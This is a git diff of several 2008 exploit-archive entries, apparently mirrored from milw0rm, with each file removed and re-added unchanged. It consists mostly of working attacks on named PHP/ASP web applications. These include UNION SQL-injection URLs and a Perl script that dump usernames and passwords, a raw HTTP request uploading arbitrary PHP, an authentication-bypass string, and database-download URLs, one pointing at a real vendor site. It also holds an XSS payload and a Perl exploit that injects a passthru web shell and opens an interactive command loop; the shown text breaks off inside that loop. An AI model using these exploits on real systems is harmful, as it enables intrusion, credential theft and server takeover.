-Fkhatar L3chran wwlad darb wlidat l9issm wmansach L3chira
-=========================[JAWAD Cha7ta 4 ever]===================
-# Exploit  :
-               http://no-exploit.com
-
-http://no-exploit.com//z1exchange/edit.php?site=[sql]
-http://no-exploit.com//z1exchange/edit.php?site=-12%20union%20select%200,1,username,password,4,version(),user(),7,8,9,10,11,database(),13,14,15,16,17,18++from+users--
-
-DEMO:
-
-http://localhost/scripts/z1exchange/z1exchange/edit.php?site=-12 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
-
-=========================[Thanks To Allah ]===================
- greetz : all my friend and all No-exploit members and
- $ Gold_M $ Cochlain $ Hassin X $ cyber-zone $ r00t c0d3r $ HiSoKa $
-MizoZ $ leopard
- all muslims
- visit: www.no-exploit.Com
- Visit: My-montada.Co.cc For your free Forum
- 
--------------------------------------------------------------------------
-  --          JIKO FroM No-exploit.Com        ---
--------------------------------------------------------------------------
-------==        troops of Mohamed comming inchalah     =-----------------
-Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc
-Raha nayda Nood :)Fuck Bigg Kbir Lkarcha Bo ta7cha stoon dyalibou7do hwa cha7ta
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++          [!]  Fi Khater Mgharba wahed wahed , Kima tayGol Khoya cyber-zone , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!]        ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-
-# milw0rm.com [2008-12-01]
+-------------------------------------------------------------------------
+  --          JIKO FroM No-exploit.Com        ---
+-------------------------------------------------------------------------
+# Author  : jiko
+# email  : jalikom@hotmail.com
+# Home   : www.no-exploit.Com
+# Script  : z1exchange-->http://1scripts.net/scripts/z1exchange.zip
+ Proud To Be MoroCCaN -->> WwW.No-ExploiT.CoM  , WwW.Exploiter5.CoM
+Fkhatar L3chran wwlad darb wlidat l9issm wmansach L3chira
+=========================[JAWAD Cha7ta 4 ever]===================
+# Exploit  :
+               http://no-exploit.com
+
+http://no-exploit.com//z1exchange/edit.php?site=[sql]
+http://no-exploit.com//z1exchange/edit.php?site=-12%20union%20select%200,1,username,password,4,version(),user(),7,8,9,10,11,database(),13,14,15,16,17,18++from+users--
+
+DEMO:
+
+http://localhost/scripts/z1exchange/z1exchange/edit.php?site=-12 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
+
+=========================[Thanks To Allah ]===================
+ greetz : all my friend and all No-exploit members and
+ $ Gold_M $ Cochlain $ Hassin X $ cyber-zone $ r00t c0d3r $ HiSoKa $
+MizoZ $ leopard
+ all muslims
+ visit: www.no-exploit.Com
+ Visit: My-montada.Co.cc For your free Forum
+ 
+-------------------------------------------------------------------------
+  --          JIKO FroM No-exploit.Com        ---
+-------------------------------------------------------------------------
+------==        troops of Mohamed comming inchalah     =-----------------
+Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc
+Raha nayda Nood :)Fuck Bigg Kbir Lkarcha Bo ta7cha stoon dyalibou7do hwa cha7ta
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++          [!]  Fi Khater Mgharba wahed wahed , Kima tayGol Khoya cyber-zone , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!]        ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+
+# milw0rm.com [2008-12-01]
diff --git a/platforms/php/webapps/7312.txt b/platforms/php/webapps/7312.txt
index 440445d89..c860247d4 100755
--- a/platforms/php/webapps/7312.txt
+++ b/platforms/php/webapps/7312.txt
@@ -1,115 +1,115 @@
-==============================================================
- Andy's PHP Knowledgebase Arbitrary File Upload Vulnerability
-==============================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 1 December 2008
-SITE   : cwh.citec.us
-
-
-#####################################################
-APPLICATION : Andy's PHP Knowledgebase
-VERSION     : 0.92.9
-DOWNLOAD    : http://sourceforge.net/project/showfiles.php?group_id=113755
-#####################################################
-
---- Arbitrary File Upload ---
-
-In saa.php page, you can submit an article and attachment file to wait for approval from admin.
-Immediately after you submit the article and attachment file, the file has already been on the server without checking file type.
-You can upload arbitary file through this form and the url to this file is in authors.php page.
-
---------
-  POC
---------
-
-POST /cms/aphpkb/saa.php HTTP/1.1
-Host: 127.0.0.1
-User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-Accept-Language: en-us,en;q=0.5
-Accept-Encoding: gzip,deflate
-Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
-Keep-Alive: 300
-Connection: keep-alive
-Referer: http://127.0.0.1/cms/aphpkb/saa.php?aid=2
-Cookie: module=table; PHPSESSID=b311c4f9b1f3ee0c071f33ffd3b3176f
-Content-Type: multipart/form-data; boundary=---------------------------22955284022147
-Content-Length: 1080
------------------------------22955284022147
-Content-Disposition: form-data; name="title"
-
-PoC Arbitrary File Upload
------------------------------22955284022147
-Content-Disposition: form-data; name="article"
-
-PoC Arbitrary File Upload
------------------------------22955284022147
-Content-Disposition: form-data; name="keywords"
-
-PoC Arbitrary File Upload
------------------------------22955284022147
-Content-Disposition: form-data; name="aid"
-
-2
------------------------------22955284022147
-Content-Disposition: form-data; name="upload"; filename="info.php"
-Content-Type: application/octet-stream
-
-<? phpinfo(); ?>
------------------------------22955284022147
-Content-Disposition: form-data; name="description"
-
-PHP File
------------------------------22955284022147
-Content-Disposition: form-data; name="aid"
-
-2
------------------------------22955284022147
-Content-Disposition: form-data; name="a"
-
-
------------------------------22955284022147
-Content-Disposition: form-data; name="submit"
-
-Submit/Save
------------------------------22955284022147--
-
-
-HTTP/1.x 200 OK
-Date: Mon, 01 Dec 2008 05:39:35 GMT
-Server: Apache/2.2.8 (Win32) PHP/5.2.6
-X-Powered-By: PHP/5.2.6
-Expires: Thu, 19 Nov 1981 08:52:00 GMT
-Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
-Pragma: no-cache
-Content-Length: 4578
-Keep-Alive: timeout=5, max=100
-Connection: Keep-Alive
-Content-Type: text/html
-
-
------------------------------------------------------------------------
-
-Link for uploaded file is in http://[Target]/[aphpkb_path]/authors.php
-
-
-#######################################################################################
-Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
-Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#######################################################################################
-
-# milw0rm.com [2008-12-01]
+==============================================================
+ Andy's PHP Knowledgebase Arbitrary File Upload Vulnerability
+==============================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 1 December 2008
+SITE   : cwh.citec.us
+
+
+#####################################################
+APPLICATION : Andy's PHP Knowledgebase
+VERSION     : 0.92.9
+DOWNLOAD    : http://sourceforge.net/project/showfiles.php?group_id=113755
+#####################################################
+
+--- Arbitrary File Upload ---
+
+In saa.php page, you can submit an article and attachment file to wait for approval from admin.
+Immediately after you submit the article and attachment file, the file has already been on the server without checking file type.
+You can upload arbitary file through this form and the url to this file is in authors.php page.
+
+--------
+  POC
+--------
+
+POST /cms/aphpkb/saa.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18
+Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip,deflate
+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+Keep-Alive: 300
+Connection: keep-alive
+Referer: http://127.0.0.1/cms/aphpkb/saa.php?aid=2
+Cookie: module=table; PHPSESSID=b311c4f9b1f3ee0c071f33ffd3b3176f
+Content-Type: multipart/form-data; boundary=---------------------------22955284022147
+Content-Length: 1080
+-----------------------------22955284022147
+Content-Disposition: form-data; name="title"
+
+PoC Arbitrary File Upload
+-----------------------------22955284022147
+Content-Disposition: form-data; name="article"
+
+PoC Arbitrary File Upload
+-----------------------------22955284022147
+Content-Disposition: form-data; name="keywords"
+
+PoC Arbitrary File Upload
+-----------------------------22955284022147
+Content-Disposition: form-data; name="aid"
+
+2
+-----------------------------22955284022147
+Content-Disposition: form-data; name="upload"; filename="info.php"
+Content-Type: application/octet-stream
+
+<? phpinfo(); ?>
+-----------------------------22955284022147
+Content-Disposition: form-data; name="description"
+
+PHP File
+-----------------------------22955284022147
+Content-Disposition: form-data; name="aid"
+
+2
+-----------------------------22955284022147
+Content-Disposition: form-data; name="a"
+
+
+-----------------------------22955284022147
+Content-Disposition: form-data; name="submit"
+
+Submit/Save
+-----------------------------22955284022147--
+
+
+HTTP/1.x 200 OK
+Date: Mon, 01 Dec 2008 05:39:35 GMT
+Server: Apache/2.2.8 (Win32) PHP/5.2.6
+X-Powered-By: PHP/5.2.6
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 4578
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html
+
+
+-----------------------------------------------------------------------
+
+Link for uploaded file is in http://[Target]/[aphpkb_path]/authors.php
+
+
+#######################################################################################
+Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
+Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#######################################################################################
+
+# milw0rm.com [2008-12-01]
diff --git a/platforms/php/webapps/7315.txt b/platforms/php/webapps/7315.txt
index c5d5f4745..290c2ae26 100755
--- a/platforms/php/webapps/7315.txt
+++ b/platforms/php/webapps/7315.txt
@@ -1,20 +1,20 @@
-Description:
-************* ***************** ************* *******************
-E.Z. Poll <= v.2 script Remote SQL injection Exploit
-discovered by t0fx aka xtof69
-vendor : E.Z.
-
-
-************* ***************** ************* *******************
-
-vulnerable page : http://www.site.com/admin/login.asp
-
-exploit :
-
-Username : 'or' '='
-Password : 'or' '='
-
-Add, modify user :
-/admin/admin-users.asp 
-
-# milw0rm.com [2008-12-01]
+Description:
+************* ***************** ************* *******************
+E.Z. Poll <= v.2 script Remote SQL injection Exploit
+discovered by t0fx aka xtof69
+vendor : E.Z.
+
+
+************* ***************** ************* *******************
+
+vulnerable page : http://www.site.com/admin/login.asp
+
+exploit :
+
+Username : 'or' '='
+Password : 'or' '='
+
+Add, modify user :
+/admin/admin-users.asp 
+
+# milw0rm.com [2008-12-01]
diff --git a/platforms/php/webapps/7317.pl b/platforms/php/webapps/7317.pl
index 18a882048..0a94f01d3 100755
--- a/platforms/php/webapps/7317.pl
+++ b/platforms/php/webapps/7317.pl
@@ -1,95 +1,95 @@
-#!/usr/bin/perl -w
-#============================================
-# bcoos 1.0.13 Remote SQL Injection Exploit
-#============================================
-#
-#  ,--^----------,--------,-----,-------^--,
-#  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-#  `+---------------------------^----------|
-#    `\_,-------, _________________________|
-#      / XXXXXX /`|     /
-#     / XXXXXX /  `\   /
-#    / XXXXXX /\______(
-#   / XXXXXX /           
-#  / XXXXXX /
-# (________(             
-#  `------'
-#
-#AUTHOR : CWH Underground
-#DATE : 1 December 2008
-#SITE : cwh.citec.us
-#
-#
-#####################################################
-#APPLICATION : bcoos 
-#VERSION	 : 1.0.13 (Prior versions also maybe affected)
-#VENDOR		 : http://www.bcoos.net/
-#DOWNLOAD    : http://www.bcoos.net/modules/mydownloads/cache/files/bcoos1.0.13.zip
-######################################################
-#
-#Note: magic_quotes_gpc = off
-#Addresses Modules Must be Installed
-#
-#######################################################################################
-#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
-#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#######################################################################################
-
-
-use LWP::UserAgent;
-use HTTP::Request;
-
-if ($#ARGV+1 != 2)
-{
-   print "\n==============================================\n";
-   print "      Bcoos Remote SQL Injection Exploit   \n";
-   print "                                              \n";
-   print "        Discovered By CWH Underground         \n";
-   print "==============================================\n";
-   print "                                              \n";
-   print "  ,--^----------,--------,-----,-------^--,   \n";
-   print "  | |||||||||   `--------'     |          O	\n";
-   print "  `+---------------------------^----------|   \n";
-   print "    `\_,-------, _________________________|   \n";
-   print "      / XXXXXX /`|     /                      \n";
-   print "     / XXXXXX /  `\   /                       \n";
-   print "    / XXXXXX /\______(                        \n";
-   print "   / XXXXXX /                                 \n";
-   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
-   print " (________(                                   \n";
-   print "  `------'                                    \n";
-   print "                                              \n"; 
-   print "Usage  : ./xpl.pl <Target> <Data Limit>\n";
-   print "Example: ./xpl.pl http://www.target.com/bcoos 10\n";
-   exit();
-}
-
-$target  = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];
-$number = $ARGV[1];
-
-print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
-print "\n  ..:: SQL Injection Exploit By CWH Underground ::.. ";
-print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
-print "\n[+]Dump Username and Password\n";
-
-for ($start=0;$start<$number;$start++) {
-
-$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$req = HTTP::Request->new(GET => $target."/modules/adresses/viewcat.php?cid=1%27%20and%201=2%20union%20select%201,concat(0x3a3a3a,uname,0x3a3a,pass,0x3a3a3a)%20from%20bcoos_users%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n";
-$res = $xpl->request($req);
-$info = $res->content;
-$count=$start+1;
-
-if ($info =~ /:::(.+):::/)
-{
-$dump=$1;
-($username,$password)= split('::',$dump);
-printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
-}
-else { 
-	print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
-	exit;
-}
-}
-
-# milw0rm.com [2008-12-01]
+#!/usr/bin/perl -w
+#============================================
+# bcoos 1.0.13 Remote SQL Injection Exploit
+#============================================
+#
+#  ,--^----------,--------,-----,-------^--,
+#  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+#  `+---------------------------^----------|
+#    `\_,-------, _________________________|
+#      / XXXXXX /`|     /
+#     / XXXXXX /  `\   /
+#    / XXXXXX /\______(
+#   / XXXXXX /           
+#  / XXXXXX /
+# (________(             
+#  `------'
+#
+#AUTHOR : CWH Underground
+#DATE : 1 December 2008
+#SITE : cwh.citec.us
+#
+#
+#####################################################
+#APPLICATION : bcoos 
+#VERSION	 : 1.0.13 (Prior versions also maybe affected)
+#VENDOR		 : http://www.bcoos.net/
+#DOWNLOAD    : http://www.bcoos.net/modules/mydownloads/cache/files/bcoos1.0.13.zip
+######################################################
+#
+#Note: magic_quotes_gpc = off
+#Addresses Modules Must be Installed
+#
+#######################################################################################
+#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
+#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#######################################################################################
+
+
+use LWP::UserAgent;
+use HTTP::Request;
+
+if ($#ARGV+1 != 2)
+{
+   print "\n==============================================\n";
+   print "      Bcoos Remote SQL Injection Exploit   \n";
+   print "                                              \n";
+   print "        Discovered By CWH Underground         \n";
+   print "==============================================\n";
+   print "                                              \n";
+   print "  ,--^----------,--------,-----,-------^--,   \n";
+   print "  | |||||||||   `--------'     |          O	\n";
+   print "  `+---------------------------^----------|   \n";
+   print "    `\_,-------, _________________________|   \n";
+   print "      / XXXXXX /`|     /                      \n";
+   print "     / XXXXXX /  `\   /                       \n";
+   print "    / XXXXXX /\______(                        \n";
+   print "   / XXXXXX /                                 \n";
+   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
+   print " (________(                                   \n";
+   print "  `------'                                    \n";
+   print "                                              \n"; 
+   print "Usage  : ./xpl.pl <Target> <Data Limit>\n";
+   print "Example: ./xpl.pl http://www.target.com/bcoos 10\n";
+   exit();
+}
+
+$target  = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];
+$number = $ARGV[1];
+
+print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
+print "\n  ..:: SQL Injection Exploit By CWH Underground ::.. ";
+print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
+print "\n[+]Dump Username and Password\n";
+
+for ($start=0;$start<$number;$start++) {
+
+$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$req = HTTP::Request->new(GET => $target."/modules/adresses/viewcat.php?cid=1%27%20and%201=2%20union%20select%201,concat(0x3a3a3a,uname,0x3a3a,pass,0x3a3a3a)%20from%20bcoos_users%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n";
+$res = $xpl->request($req);
+$info = $res->content;
+$count=$start+1;
+
+if ($info =~ /:::(.+):::/)
+{
+$dump=$1;
+($username,$password)= split('::',$dump);
+printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
+}
+else { 
+	print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
+	exit;
+}
+}
+
+# milw0rm.com [2008-12-01]
diff --git a/platforms/php/webapps/7318.txt b/platforms/php/webapps/7318.txt
index 7773835ee..8c26b0cb4 100755
--- a/platforms/php/webapps/7318.txt
+++ b/platforms/php/webapps/7318.txt
@@ -1,46 +1,46 @@
-###########################################################################
-#-----------------------------OffensiveTrack------------------------------#
-###########################################################################
-
-
----------------------------- Tunisia Muslim ------------------------------
-
-
-
-
-#found by : OffensiveTrack
-#Author   : AlpHaNiX
-#website  : www.offensivetrack.org
-
-#contact  : AlpHa[AT]HACKER[DOT]BZ
-
-
-
-
-###########################################################################
-
-
-
-#script   : PacPoll
-#version  : v4
-#download : http://pacosdrivers.com/asp/poll/count.asp?u_link=dload.asp
-
-
-
-
-#Exploit :
-http://target.com/script/poll.mdb
-http://target.com/script/poll97.mdb
-
-#live example :
-http://pacosdrivers.com/asp/poll/poll.mdb
-
-
-
-
-
-#greetz : Zigma , Serh , Simo-Soft &  dear Slax
-
-###########################################################################
-
-# milw0rm.com [2008-12-01]
+###########################################################################
+#-----------------------------OffensiveTrack------------------------------#
+###########################################################################
+
+
+---------------------------- Tunisia Muslim ------------------------------
+
+
+
+
+#found by : OffensiveTrack
+#Author   : AlpHaNiX
+#website  : www.offensivetrack.org
+
+#contact  : AlpHa[AT]HACKER[DOT]BZ
+
+
+
+
+###########################################################################
+
+
+
+#script   : PacPoll
+#version  : v4
+#download : http://pacosdrivers.com/asp/poll/count.asp?u_link=dload.asp
+
+
+
+
+#Exploit :
+http://target.com/script/poll.mdb
+http://target.com/script/poll97.mdb
+
+#live example :
+http://pacosdrivers.com/asp/poll/poll.mdb
+
+
+
+
+
+#greetz : Zigma , Serh , Simo-Soft &  dear Slax
+
+###########################################################################
+
+# milw0rm.com [2008-12-01]
diff --git a/platforms/php/webapps/7319.txt b/platforms/php/webapps/7319.txt
index 0c3f09020..600802986 100755
--- a/platforms/php/webapps/7319.txt
+++ b/platforms/php/webapps/7319.txt
@@ -1,21 +1,21 @@
-#########################################################
----------------------------------------------------------
-Portal Name: Ocean12 Mailing List Manager Gold
-Vendor : http://ocean12tech.com/products/o12mailgold
-Author : Pouya_Server , Pouya.s3rver@Gmail.com
-Vulnerability : (DD,SQL,XSS)
----------------------------------------------------------
-#########################################################
-[DD]:
-http://site.com/[Path]/o12mail.mdb
-[SQL]:
-http://site.com/[Path]/s_edit.asp?email=[SQL]
-http://site.com/[Path]/default.asp?Page=2&Email='[SQL]
-[XSS]:
-http://site.com/[Path]/default.asp?Error=Pouya_Server&Name=&Email=Pouya.s3rver@gmail.com"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>
-
----------------------------------
-Victem :
-http://ocean12tech.com/products/o12mailgold/demo
-
-# milw0rm.com [2008-12-02]
+#########################################################
+---------------------------------------------------------
+Portal Name: Ocean12 Mailing List Manager Gold
+Vendor : http://ocean12tech.com/products/o12mailgold
+Author : Pouya_Server , Pouya.s3rver@Gmail.com
+Vulnerability : (DD,SQL,XSS)
+---------------------------------------------------------
+#########################################################
+[DD]:
+http://site.com/[Path]/o12mail.mdb
+[SQL]:
+http://site.com/[Path]/s_edit.asp?email=[SQL]
+http://site.com/[Path]/default.asp?Page=2&Email='[SQL]
+[XSS]:
+http://site.com/[Path]/default.asp?Error=Pouya_Server&Name=&Email=Pouya.s3rver@gmail.com"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>
+
+---------------------------------
+Victem :
+http://ocean12tech.com/products/o12mailgold/demo
+
+# milw0rm.com [2008-12-02]
diff --git a/platforms/php/webapps/7322.pl b/platforms/php/webapps/7322.pl
index a5daa09e0..aa2aaf840 100755
--- a/platforms/php/webapps/7322.pl
+++ b/platforms/php/webapps/7322.pl
@@ -1,118 +1,118 @@
-#!/usr/bin/perl
-#==================================================================
-# CMS MAXSITE Component Guestbook Remote Command Execution Exploit
-#==================================================================
-#
-#  ,--^----------,--------,-----,-------^--,
-#  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-#  `+---------------------------^----------|
-#    `\_,-------, _________________________|
-#      / XXXXXX /`|     /
-#     / XXXXXX /  `\   /
-#    / XXXXXX /\______(
-#   / XXXXXX /           
-#  / XXXXXX /
-# (________(             
-#  `------'
-#
-#AUTHOR : CWH Underground
-#DATE : 2 December 2008
-#SITE : cwh.citec.us
-#
-#
-#####################################################################
-#APPLICATION : CMS MAXSITE Component Guestbook
-#COMPONENT   : Guestbook
-#DOWNLOAD	 : http://maxsite.geniuscyber.com/download/Ex-guestbook.rar
-#####################################################################
-#
-#
-#####################################################################
-# Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos   
-# Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#####################################################################
-
-use LWP;
-use HTTP::Request;
-
-my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
-
-print "\n==================================================\n";
-print "    CMS MAXSITE Component Guestbook RCE Exploit \n";
-print " \n";
-print "         Discovered By CWH Underground \n";
-print "==================================================\n";
-print "                                              \n";
-print "  ,--^----------,--------,-----,-------^--,   \n";
-print "  | |||||||||   `--------'     |          O	\n";
-print "  `+---------------------------^----------|   \n";
-print "    `\_,-------, _________________________|   \n";
-print "      / XXXXXX /`|     /                      \n";
-print "     / XXXXXX /  `\   /                       \n";
-print "    / XXXXXX /\______(                        \n";
-print "   / XXXXXX /                                 \n";
-print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
-print " (________(                                   \n";
-print "  `------'                                    \n";
-print "                                              \n";
-
-if ($#ARGV != 0)
-{
-   print "Usage: ./xpl.pl <URL to index page>\n";
-   print "Ex. ./xpl.pl http://www.target.com/maxsite/index.php\n";
-   exit();
-}
-
-$index = $ARGV[0];
-$upload_url = $index."?name=guestbook&file=message";
-
-print "\n[+] Trying to Inject the Code...\n";
-
-$ua = LWP::UserAgent->new ();
-$post = HTTP::Request->new (POST => $upload_url);
-$post->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');
-$post->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');
-$post->header (Accept_Language => 'en-us,en;q=0.5');
-$post->header (Content_Type => 'application/x-www-form-urlencoded');
-$post->content ('name=CWH&aim=CWH&email=CWH&site=http%3A%2F%2Fcitec.us&message=%3C%3Fphp+%0D%0Aif%28get_magic_quotes_gpc%28%29%29%0D%0A%7B+%0D%0A%09%24_GET%5Bcmd%5D%3Dstripslashes%28%24_GET%5Bcmd%5D%29%3B%0D%0A%7D+%0D%0Aecho+%28%22%23%23%25%24%24%25%23%23%22%29%3B%0D%0Apassthru%28%24_GET%5Bcmd%5D%29%3B+%0D%0Aecho+%28%22%23%23%25%24%24%25%23%23%22%29%3B%0D%0A%3F%3E&submitButtonName=Submit');
-
-$response = $ua->request ($post);
-
-if ($response->code ne 200) {
-	print "\nRCE Exploit Failed\n";
-	exit();
-}
-
-print "\nSuccessfully Inject Code !!!\n\n";
-print "[cwh-shell]# ";
-chomp ($cmd = <STDIN>);
-
-while ($cmd ne "exit") {
-
-	
-	$url = $index."?name=guestbook&cmd=".$cmd;
-
-	$req = HTTP::Request->new (GET => $url);
-	$req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');
-	$req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');
-	$req->header (Accept_Language => 'en-us,en;q=0.5');
-
-	
-	$response = $ua->request ($req);
-	$content = $response->content;
-
-	if ($content !~ /\#\#%\$\$%\#\#/) {
-		print ("Exploit Failed\n");
-		exit();
-	}
-
-	while ($content =~ /\#\#%\$\$%\#\#(.*?)\#\#%\$\$%\#\#/sg) {
-		print $1;
-	}
-
-	print "\n[cwh-shell]# ";
-	chomp ($cmd = <STDIN>);
-
-}
-
-# milw0rm.com [2008-12-02]
+#!/usr/bin/perl
+#==================================================================
+# CMS MAXSITE Component Guestbook Remote Command Execution Exploit
+#==================================================================
+#
+#  ,--^----------,--------,-----,-------^--,
+#  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+#  `+---------------------------^----------|
+#    `\_,-------, _________________________|
+#      / XXXXXX /`|     /
+#     / XXXXXX /  `\   /
+#    / XXXXXX /\______(
+#   / XXXXXX /           
+#  / XXXXXX /
+# (________(             
+#  `------'
+#
+#AUTHOR : CWH Underground
+#DATE : 2 December 2008
+#SITE : cwh.citec.us
+#
+#
+#####################################################################
+#APPLICATION : CMS MAXSITE Component Guestbook
+#COMPONENT   : Guestbook
+#DOWNLOAD	 : http://maxsite.geniuscyber.com/download/Ex-guestbook.rar
+#####################################################################
+#
+#
+#####################################################################
+# Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos   
+# Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#####################################################################
+
+use LWP;
+use HTTP::Request;
+
+my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
+
+print "\n==================================================\n";
+print "    CMS MAXSITE Component Guestbook RCE Exploit \n";
+print " \n";
+print "         Discovered By CWH Underground \n";
+print "==================================================\n";
+print "                                              \n";
+print "  ,--^----------,--------,-----,-------^--,   \n";
+print "  | |||||||||   `--------'     |          O	\n";
+print "  `+---------------------------^----------|   \n";
+print "    `\_,-------, _________________________|   \n";
+print "      / XXXXXX /`|     /                      \n";
+print "     / XXXXXX /  `\   /                       \n";
+print "    / XXXXXX /\______(                        \n";
+print "   / XXXXXX /                                 \n";
+print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
+print " (________(                                   \n";
+print "  `------'                                    \n";
+print "                                              \n";
+
+if ($#ARGV != 0)
+{
+   print "Usage: ./xpl.pl <URL to index page>\n";
+   print "Ex. ./xpl.pl http://www.target.com/maxsite/index.php\n";
+   exit();
+}
+
+$index = $ARGV[0];
+$upload_url = $index."?name=guestbook&file=message";
+
+print "\n[+] Trying to Inject the Code...\n";
+
+$ua = LWP::UserAgent->new ();
+$post = HTTP::Request->new (POST => $upload_url);
+$post->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');
+$post->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');
+$post->header (Accept_Language => 'en-us,en;q=0.5');
+$post->header (Content_Type => 'application/x-www-form-urlencoded');
+$post->content ('name=CWH&aim=CWH&email=CWH&site=http%3A%2F%2Fcitec.us&message=%3C%3Fphp+%0D%0Aif%28get_magic_quotes_gpc%28%29%29%0D%0A%7B+%0D%0A%09%24_GET%5Bcmd%5D%3Dstripslashes%28%24_GET%5Bcmd%5D%29%3B%0D%0A%7D+%0D%0Aecho+%28%22%23%23%25%24%24%25%23%23%22%29%3B%0D%0Apassthru%28%24_GET%5Bcmd%5D%29%3B+%0D%0Aecho+%28%22%23%23%25%24%24%25%23%23%22%29%3B%0D%0A%3F%3E&submitButtonName=Submit');
+
+$response = $ua->request ($post);
+
+if ($response->code ne 200) {
+	print "\nRCE Exploit Failed\n";
+	exit();
+}
+
+print "\nSuccessfully Inject Code !!!\n\n";
+print "[cwh-shell]# ";
+chomp ($cmd = <STDIN>);
+
+while ($cmd ne "exit") {
+
+	
+	$url = $index."?name=guestbook&cmd=".$cmd;
+
+	$req = HTTP::Request->new (GET => $url);
